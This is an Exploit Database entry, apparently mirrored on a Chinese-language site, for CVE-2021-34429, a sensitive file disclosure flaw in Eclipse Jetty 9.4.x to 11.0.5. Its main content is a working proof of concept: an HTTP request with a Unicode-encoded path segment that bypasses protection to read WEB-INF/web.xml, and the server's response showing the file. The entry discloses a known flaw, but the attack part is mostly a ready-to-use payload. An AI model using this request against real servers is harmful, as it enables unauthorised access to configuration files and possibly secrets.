Eclipse Jetty 11.0.5 – Sensitive File Disclosure

• Exploit Database
• 15 阅读

• 作者： Mayank Deshmukh
  日期： 2021-11-03
• 类别：

  • webapps
  平台：

  • java
• 来源：https://www.exploit-db.com/exploits/50478/

• # Exploit Title: Eclipse Jetty 11.0.5 - Sensitive File Disclosure 
  # Date: 2021-11-03
  # Exploit Author: Mayank Deshmukh
  # Vendor Homepage: https://www.eclipse.org/jetty/
  # Software Link: https://repo1.maven.org/maven2/org/eclipse/jetty/jetty-distribution/
  # Version: 9.4.37 ≤ version < 9.4.43, 10.0.1 ≤ version < 10.0.6, 11.0.1 ≤ version < 11.0.6
  # Security Advisory: https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm
  # Tested on: Kali Linux
  # CVE : CVE-2021-34429
  # Github POC: https://github.com/ColdFusionX/CVE-2021-34429
  
  POC - Access WEB-INF/web.xml 
  
  ## Request
  
  GET /%u002e/WEB-INF/web.xml HTTP/1.1
  Host: localhost:9006
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Connection: close
  Upgrade-Insecure-Requests: 1
  
  ## Response
  
  HTTP/1.1 200 OK
  Connection: close
  Last-Modified: Wed, 03 Nov 2021 08:25:24 GMT
  Content-Type: application/xml
  Accept-Ranges: bytes
  Content-Length: 209
  Server: Jetty(11.0.5)
  
  <!DOCTYPE web-app PUBLIC
   "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
   "http://java.sun.com/dtd/web-app_2_3.dtd" >
  
  <web-app>
  <display-name>ColdFusionX - Web Application</display-name>
  </web-app>